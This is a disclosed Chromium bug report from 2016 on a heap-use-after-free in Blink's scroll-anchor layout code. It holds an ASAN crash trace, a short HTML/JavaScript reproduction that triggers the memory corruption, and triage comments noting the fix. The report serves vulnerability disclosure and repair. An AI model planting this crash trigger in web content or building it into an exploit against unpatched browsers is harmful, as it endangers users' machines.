Issue metadata
Sign in to add a comment
|
Security: heap-use-after-free in blink::LayoutObject::maybeClearIsScrollAnchorObject
Reported by
cloudfuz...@gmail.com,
Oct 2 2016
|
||||||||||||||||||
Issue description
VULNERABILITY DETAILS
The testcase crashes the latest ASAN build of Chrome as follows:
=================================================================
==2999==ERROR: AddressSanitizer: heap-use-after-free on address 0x611000043600 at pc 0x55a1c1b6d2eb bp 0x7ffdce425630 sp 0x7ffdce425628
READ of size 7 at 0x611000043600 thread T0 (chrome)
#0 0x55a1c1b6d2ea in isScrollAnchorObject third_party/WebKit/Source/core/layout/LayoutObject.h:1853:9
#1 0x55a1c1b6d2ea in blink::LayoutObject::maybeClearIsScrollAnchorObject() third_party/WebKit/Source/core/layout/LayoutObject.cpp:2510
#2 0x55a1c0de4d45 in blink::RootFrameViewport::setLayoutViewport(blink::ScrollableArea&) third_party/WebKit/Source/core/frame/RootFrameViewport.cpp:25:43
#3 0x55a1c20b3653 in blink::TopDocumentRootScrollerController::recomputeGlobalRootScroller() third_party/WebKit/Source/core/page/scrolling/TopDocumentRootScrollerController.cpp:115:28
#4 0x55a1c0d0371d in blink::FrameView::layout() third_party/WebKit/Source/core/frame/FrameView.cpp:1126:25
#5 0x55a1c05217da in blink::Document::implicitClose() third_party/WebKit/Source/core/dom/Document.cpp:2690:21
#6 0x55a1c1f2640c in blink::FrameLoader::checkCompleted() third_party/WebKit/Source/core/loader/FrameLoader.cpp:638:30
#7 0x55a1c1f25e46 in blink::FrameLoader::finishedParsing() third_party/WebKit/Source/core/loader/FrameLoader.cpp:556:5
#8 0x55a1c0556638 in blink::Document::finishedParsing() third_party/WebKit/Source/core/dom/Document.cpp:4863:25
#9 0x55a1c12c57bc in end third_party/WebKit/Source/core/html/parser/HTMLDocumentParser.cpp:867:20
#10 0x55a1c12c57bc in attemptToRunDeferredScriptsAndEnd third_party/WebKit/Source/core/html/parser/HTMLDocumentParser.cpp:880
#11 0x55a1c12c57bc in blink::HTMLDocumentParser::prepareToStopParsing() third_party/WebKit/Source/core/html/parser/HTMLDocumentParser.cpp:235
#12 0x55a1c12d010e in blink::HTMLDocumentParser::processTokenizedChunkFromBackgroundParser(std::__1::unique_ptr<blink::HTMLDocumentParser::TokenizedChunk, std::__1::default_delete<blink::HTMLDocumentParser::TokenizedChunk> >) third_party/WebKit/Source/core/html/parser/HTMLDocumentParser.cpp:497:17
#13 0x55a1c12c7c64 in blink::HTMLDocumentParser::pumpPendingSpeculations() third_party/WebKit/Source/core/html/parser/HTMLDocumentParser.cpp:575:36
#14 0x55a1beffc341 in Invoke<std::__1::unique_ptr<blink::WebTaskRunner::Task, std::__1::default_delete<blink::WebTaskRunner::Task> > > base/bind_internal.h:164:12
#15 0x55a1beffc341 in MakeItSo<void (*const &)(std::__1::unique_ptr<blink::WebTaskRunner::Task, std::__1::default_delete<blink::WebTaskRunner::Task> >), std::__1::unique_ptr<blink::WebTaskRunner::Task, std::__1::default_delete<blink::WebTaskRunner::Task> > > base/bind_internal.h:285
#16 0x55a1beffc341 in RunImpl<void (*const &)(std::__1::unique_ptr<blink::WebTaskRunner::Task, std::__1::default_delete<blink::WebTaskRunner::Task> >), const std::__1::tuple<base::internal::PassedWrapper<std::__1::unique_ptr<blink::WebTaskRunner::Task, std::__1::default_delete<blink::WebTaskRunner::Task> > > > &, 0> base/bind_internal.h:361
#17 0x55a1beffc341 in base::internal::Invoker<base::internal::BindState<void (*)(std::__1::unique_ptr<blink::WebTaskRunner::Task, std::__1::default_delete<blink::WebTaskRunner::Task> >), base::internal::PassedWrapper<std::__1::unique_ptr<blink::WebTaskRunner::Task, std::__1::default_delete<blink::WebTaskRunner::Task> > > >, void ()>::Run(base::internal::BindStateBase*) base/bind_internal.h:339
#18 0x55a1b6e74f7c in Run base/callback.h:64:12
#19 0x55a1b6e74f7c in base::debug::TaskAnnotator::RunTask(char const*, base::PendingTask const&) base/debug/task_annotator.cc:54
#20 0x55a1bf03f0d2 in blink::scheduler::TaskQueueManager::ProcessTaskFromWorkQueue(blink::scheduler::internal::WorkQueue*) third_party/WebKit/Source/platform/scheduler/base/task_queue_manager.cc:344:19
#21 0x55a1bf039f39 in blink::scheduler::TaskQueueManager::DoWork(base::TimeTicks, bool) third_party/WebKit/Source/platform/scheduler/base/task_queue_manager.cc:240:13
#22 0x55a1b6e74f7c in Run base/callback.h:64:12
#23 0x55a1b6e74f7c in base::debug::TaskAnnotator::RunTask(char const*, base::PendingTask const&) base/debug/task_annotator.cc:54
#24 0x55a1b6c89097 in base::MessageLoop::RunTask(base::PendingTask const&) base/message_loop/message_loop.cc:405:19
#25 0x55a1b6c89e1f in base::MessageLoop::DeferOrRunPendingTask(base::PendingTask) base/message_loop/message_loop.cc:414:5
#26 0x55a1b6c8b3da in base::MessageLoop::DoWork() base/message_loop/message_loop.cc:513:13
#27 0x55a1b6c95a5d in base::MessagePumpDefault::Run(base::MessagePump::Delegate*) base/message_loop/message_pump_default.cc:35:31
#28 0x55a1b6d14f44 in base::RunLoop::Run() base/run_loop.cc:35:10
#29 0x55a1c3dc361d in content::RendererMain(content::MainFunctionParams const&) content/renderer/renderer_main.cc:198:23
#30 0x55a1b5de08b1 in content::RunZygote(content::MainFunctionParams const&, content::ContentMainDelegate*) content/app/content_main_runner.cc:343:14
#31 0x55a1b5de5116 in content::ContentMainRunnerImpl::Run() content/app/content_main_runner.cc:786:12
#32 0x55a1b5ddf67d in content::ContentMain(content::ContentMainParams const&) content/app/content_main.cc:20:28
#33 0x55a1af860622 in ChromeMain chrome/app/chrome_main.cc:97:12
#34 0x7f4e9db6882f in __libc_start_main /build/glibc-GKVZIf/glibc-2.23/csu/../csu/libc-start.c:291
0x611000043600 is located 64 bytes inside of 240-byte region [0x6110000435c0,0x6110000436b0)
freed by thread T0 (chrome) here:
#0 0x55a1af83456b in __interceptor_free (/home/nils/MonkeyChrome/OpRealEstate/asan-linux-release-422171/chrome+0x2f7d56b)
#1 0x55a1c06c956b in blink::Node::detachLayoutTree(blink::Node::AttachContext const&) third_party/WebKit/Source/core/dom/Node.cpp:909:25
#2 0x55a1c047399e in blink::ContainerNode::detachLayoutTree(blink::Node::AttachContext const&) third_party/WebKit/Source/core/dom/ContainerNode.cpp:738:11
#3 0x55a1c05de9bc in blink::Element::detachLayoutTree(blink::Node::AttachContext const&) third_party/WebKit/Source/core/dom/Element.cpp:1637:20
#4 0x55a1c0473945 in blink::ContainerNode::detachLayoutTree(blink::Node::AttachContext const&) third_party/WebKit/Source/core/dom/ContainerNode.cpp:735:16
#5 0x55a1c051a8d3 in blink::Document::shutdown() third_party/WebKit/Source/core/dom/Document.cpp:2233:20
#6 0x55a1c1f2fe14 in blink::FrameLoader::prepareForCommit() third_party/WebKit/Source/core/loader/FrameLoader.cpp:1144:30
#7 0x55a1c1f304b9 in blink::FrameLoader::commitProvisionalLoad() third_party/WebKit/Source/core/loader/FrameLoader.cpp:1161:10
#8 0x55a1c1eccfa9 in commitIfReady third_party/WebKit/Source/core/loader/DocumentLoader.cpp:263:24
#9 0x55a1c1eccfa9 in blink::DocumentLoader::processData(char const*, unsigned long) third_party/WebKit/Source/core/loader/DocumentLoader.cpp:548
#10 0x55a1c1ecca58 in blink::DocumentLoader::dataReceived(blink::Resource*, char const*, unsigned long) third_party/WebKit/Source/core/loader/DocumentLoader.cpp:526:5
#11 0x55a1c72f5a1d in blink::RawResource::appendData(char const*, unsigned long) third_party/WebKit/Source/core/fetch/RawResource.cpp:98:12
#12 0x55a1c0c87b9e in blink::ResourceLoader::didReceiveData(blink::WebURLLoader*, char const*, int, int, int) third_party/WebKit/Source/core/fetch/ResourceLoader.cpp:171:17
#13 0x55a1bebecb8e in content::WebURLLoaderImpl::Context::OnReceivedData(std::__1::unique_ptr<content::RequestPeer::ReceivedData, std::__1::default_delete<content::RequestPeer::ReceivedData> >) content/child/web_url_loader_impl.cc:773:14
#14 0x55a1bebdf7ee in content::WebURLLoaderImpl::Context::HandleDataURL() content/child/web_url_loader_impl.cc:914:7
#15 0x55a1b6e74f7c in Run base/callback.h:64:12
#16 0x55a1b6e74f7c in base::debug::TaskAnnotator::RunTask(char const*, base::PendingTask const&) base/debug/task_annotator.cc:54
#17 0x55a1bf03f0d2 in blink::scheduler::TaskQueueManager::ProcessTaskFromWorkQueue(blink::scheduler::internal::WorkQueue*) third_party/WebKit/Source/platform/scheduler/base/task_queue_manager.cc:344:19
#18 0x55a1bf039f39 in blink::scheduler::TaskQueueManager::DoWork(base::TimeTicks, bool) third_party/WebKit/Source/platform/scheduler/base/task_queue_manager.cc:240:13
#19 0x55a1b6e74f7c in Run base/callback.h:64:12
#20 0x55a1b6e74f7c in base::debug::TaskAnnotator::RunTask(char const*, base::PendingTask const&) base/debug/task_annotator.cc:54
#21 0x55a1b6c89097 in base::MessageLoop::RunTask(base::PendingTask const&) base/message_loop/message_loop.cc:405:19
#22 0x55a1b6c89e1f in base::MessageLoop::DeferOrRunPendingTask(base::PendingTask) base/message_loop/message_loop.cc:414:5
#23 0x55a1b6c8b3da in base::MessageLoop::DoWork() base/message_loop/message_loop.cc:513:13
#24 0x55a1b6c95a5d in base::MessagePumpDefault::Run(base::MessagePump::Delegate*) base/message_loop/message_pump_default.cc:35:31
#25 0x55a1b6d14f44 in base::RunLoop::Run() base/run_loop.cc:35:10
#26 0x55a1c3dc361d in content::RendererMain(content::MainFunctionParams const&) content/renderer/renderer_main.cc:198:23
#27 0x55a1b5de08b1 in content::RunZygote(content::MainFunctionParams const&, content::ContentMainDelegate*) content/app/content_main_runner.cc:343:14
#28 0x55a1b5de5116 in content::ContentMainRunnerImpl::Run() content/app/content_main_runner.cc:786:12
#29 0x55a1b5ddf67d in content::ContentMain(content::ContentMainParams const&) content/app/content_main.cc:20:28
#30 0x55a1af860622 in ChromeMain chrome/app/chrome_main.cc:97:12
#31 0x7f4e9db6882f in __libc_start_main /build/glibc-GKVZIf/glibc-2.23/csu/../csu/libc-start.c:291
previously allocated by thread T0 (chrome) here:
#0 0x55a1af8348bc in __interceptor_malloc (/home/nils/MonkeyChrome/OpRealEstate/asan-linux-release-422171/chrome+0x2f7d8bc)
#1 0x55a1c1b3dd35 in partitionAlloc third_party/WebKit/Source/wtf/allocator/PartitionAlloc.h:660:20
#2 0x55a1c1b3dd35 in operator new third_party/WebKit/Source/core/layout/LayoutObject.cpp:149
#3 0x55a1c1b3dd35 in blink::LayoutObject::createObject(blink::Element*, blink::ComputedStyle const&) third_party/WebKit/Source/core/layout/LayoutObject.cpp:190
#4 0x55a1c0675ce1 in blink::LayoutTreeBuilderForElement::createLayoutObject() third_party/WebKit/Source/core/dom/LayoutTreeBuilder.cpp:121:45
#5 0x55a1c05dcddc in createLayoutObjectIfNeeded third_party/WebKit/Source/core/dom/LayoutTreeBuilder.h:76:13
#6 0x55a1c05dcddc in blink::Element::attachLayoutTree(blink::Node::AttachContext const&) third_party/WebKit/Source/core/dom/Element.cpp:1574
#7 0x55a1c06c91a3 in blink::Node::reattachLayoutTree(blink::Node::AttachContext const&) third_party/WebKit/Source/core/dom/Node.cpp:887:5
#8 0x55a1c05e2cde in buildLayoutTree third_party/WebKit/Source/core/dom/Element.cpp:1883:5
#9 0x55a1c05e2cde in blink::Element::recalcOwnStyle(blink::StyleRecalcChange) third_party/WebKit/Source/core/dom/Element.cpp:1839
#10 0x55a1c05e1a03 in blink::Element::recalcStyle(blink::StyleRecalcChange, blink::Text*) third_party/WebKit/Source/core/dom/Element.cpp:1754:22
#11 0x55a1c0512c60 in blink::Document::updateStyle() third_party/WebKit/Source/core/dom/Document.cpp:1821:30
#12 0x55a1c0501831 in blink::Document::updateStyleAndLayoutTree() third_party/WebKit/Source/core/dom/Document.cpp:1753:5
#13 0x55a1c05160e5 in blink::Document::updateStyleAndLayoutTreeIgnorePendingStylesheets() third_party/WebKit/Source/core/dom/Document.cpp:1999:5
#14 0x55a1c0514a22 in blink::Document::updateStyleAndLayoutIgnorePendingStylesheets(blink::Document::RunPostLayoutTasks) third_party/WebKit/Source/core/dom/Document.cpp:2004:5
#15 0x55a1c0d96063 in blink::LocalDOMWindow::scrollBy(double, double, blink::ScrollBehavior) const third_party/WebKit/Source/core/frame/LocalDOMWindow.cpp:1083:17
#16 0x55a1bf640819 in scrollBy2Method out/Release/gen/blink/bindings/core/v8/V8Window.cpp:5516:11
#17 0x55a1bf640819 in scrollByMethod out/Release/gen/blink/bindings/core/v8/V8Window.cpp:5552
#18 0x55a1bf640819 in blink::DOMWindowV8Internal::scrollByMethodCallback(v8::FunctionCallbackInfo<v8::Value> const&) out/Release/gen/blink/bindings/core/v8/V8Window.cpp:5573
#19 0x55a1b0707db3 in v8::internal::FunctionCallbackArguments::Call(void (*)(v8::FunctionCallbackInfo<v8::Value> const&)) v8/src/api-arguments.cc:19:3
#20 0x55a1b09127c9 in v8::internal::MaybeHandle<v8::internal::Object> v8::internal::(anonymous namespace)::HandleApiCallHelper<false>(v8::internal::Isolate*, v8::internal::Handle<v8::internal::HeapObject>, v8::internal::Handle<v8::internal::HeapObject>, v8::internal::Handle<v8::internal::FunctionTemplateInfo>, v8::internal::Handle<v8::internal::Object>, v8::internal::BuiltinArguments) v8/src/builtins/builtins-api.cc:106:36
#21 0x55a1b090f5a8 in v8::internal::Builtin_Impl_HandleApiCall(v8::internal::BuiltinArguments, v8::internal::Isolate*) v8/src/builtins/builtins-api.cc:135:5
#22 0x7f4d2ad043a6 (<unknown module>)
#23 0x7f4d2ae09136 (<unknown module>)
#24 0x7f4d2ae08935 (<unknown module>)
#25 0x7f4d2ad4e062 (<unknown module>)
#26 0x7f4d2ad2b980 (<unknown module>)
#27 0x55a1b14fcb92 in v8::internal::(anonymous namespace)::Invoke(v8::internal::Isolate*, bool, v8::internal::Handle<v8::internal::Object>, v8::internal::Handle<v8::internal::Object>, int, v8::internal::Handle<v8::internal::Object>*, v8::internal::Handle<v8::internal::Object>) v8/src/execution.cc:139:13
#28 0x55a1b14fc2e7 in v8::internal::Execution::Call(v8::internal::Isolate*, v8::internal::Handle<v8::internal::Object>, v8::internal::Handle<v8::internal::Object>, int, v8::internal::Handle<v8::internal::Object>*) v8/src/execution.cc:176:10
#29 0x55a1b0774197 in v8::Function::Call(v8::Local<v8::Context>, v8::Local<v8::Value>, int, v8::Local<v8::Value>*) v8/src/api.cc:4899:7
#30 0x55a1bf46674a in blink::V8ScriptRunner::callFunction(v8::Local<v8::Function>, blink::ExecutionContext*, v8::Local<v8::Value>, int, v8::Local<v8::Value>*, v8::Isolate*) third_party/WebKit/Source/bindings/core/v8/V8ScriptRunner.cpp:507:50
#31 0x55a1c6e8d5a5 in blink::V8LazyEventListener::callListenerFunction(blink::ScriptState*, v8::Local<v8::Value>, blink::Event*) third_party/WebKit/Source/bindings/core/v8/V8LazyEventListener.cpp:101:10
#32 0x55a1bf502322 in blink::V8AbstractEventListener::invokeEventHandler(blink::ScriptState*, blink::Event*, v8::Local<v8::Value>) third_party/WebKit/Source/bindings/core/v8/V8AbstractEventListener.cpp:130:23
#33 0x55a1bf501de7 in blink::V8AbstractEventListener::handleEvent(blink::ScriptState*, blink::Event*) third_party/WebKit/Source/bindings/core/v8/V8AbstractEventListener.cpp:95:5
#34 0x55a1bf5019b5 in blink::V8AbstractEventListener::handleEvent(blink::ExecutionContext*, blink::Event*) third_party/WebKit/Source/bindings/core/v8/V8AbstractEventListener.cpp:84:5
#35 0x55a1c0bb072b in blink::EventTarget::fireEventListeners(blink::Event*, blink::EventTargetData*, blink::HeapVector<blink::RegisteredEventListener, 1ul>&) third_party/WebKit/Source/core/events/EventTarget.cpp:654:19
SUMMARY: AddressSanitizer: heap-use-after-free third_party/WebKit/Source/core/layout/LayoutObject.h:1853:9 in isScrollAnchorObject
Shadow bytes around the buggy address:
0x0c2280000670: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
0x0c2280000680: fd fd fd fd fd fd fd fd fa fa fa fa fa fa fa fa
0x0c2280000690: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
0x0c22800006a0: fd fd fd fd fd fd fd fd fd fd fa fa fa fa fa fa
0x0c22800006b0: fa fa fa fa fa fa fa fa fd fd fd fd fd fd fd fd
=>0x0c22800006c0:[fd]fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
0x0c22800006d0: fd fd fd fd fd fd fa fa fa fa fa fa fa fa fa fa
0x0c22800006e0: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
0x0c22800006f0: fd fd fd fd fd fd fd fd fd fa fa fa fa fa fa fa
0x0c2280000700: fa fa fa fa fa fa fa fa fd fd fd fd fd fd fd fd
0x0c2280000710: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
Shadow byte legend (one shadow byte represents 8 application bytes):
Addressable: 00
Partially addressable: 01 02 03 04 05 06 07
Heap left redzone: fa
Freed heap region: fd
Stack left redzone: f1
Stack mid redzone: f2
Stack right redzone: f3
Stack after return: f5
Stack use after scope: f8
Global redzone: f9
Global init order: f6
Poisoned by user: f7
Container overflow: fc
Array cookie: ac
Intra object redzone: bb
ASan internal: fe
Left alloca redzone: ca
Right alloca redzone: cb
==2999==ABORTING
VERSION
Chrome Version: asan-linux-release-422171
REPRODUCTION CASE
<script>
function start() {
o0=window.document;
o52=document.createElement('frame');
o179=document.createElement('div');
document.documentElement.appendChild(o179);
o179.appendChild(o52);
o52.contentDocument.replaceChild(o0.documentElement,o52.contentDocument.documentElement);
o2096=document.createElement('iframe');
o2096.src='data:text/html,blank';
o2096.width='2097137px';
o2096.height='1px';
o0.appendChild(o2096);
o3122=frames[0];
o3122.scrollBy(1048576,64);
document.documentElement.style.zoom='0.0001';
}
</script>
<body onload="start()"></body>
FOR CRASHES, PLEASE INCLUDE THE FOLLOWING ADDITIONAL INFORMATION
Type of crash: tab
,
Oct 4 2016
Hi cloudfuzzer, CF didn't reproduce your crash today. Can you please confirm that you are still seeing this with the latest trunk build? Thanks.
,
Oct 4 2016
https://cluster-fuzz.appspot.com/testcase?key=5749933804355584 is a second upload just to be sure ...
,
Oct 5 2016
Hi, I just tried with the latest build (asan-linux-release-422674) and it does not reproduce any more.
,
Oct 5 2016
,
Jan 12 2017
This bug has been closed for more than 14 weeks. Removing security view restrictions. For more details visit https://www.chromium.org/issue-tracking/autotriage - Your friendly Sheriffbot |
|||||||||||||||||||
►
Sign in to add a comment |
|||||||||||||||||||
Comment 1 by ClusterFuzz
, Oct 3 2016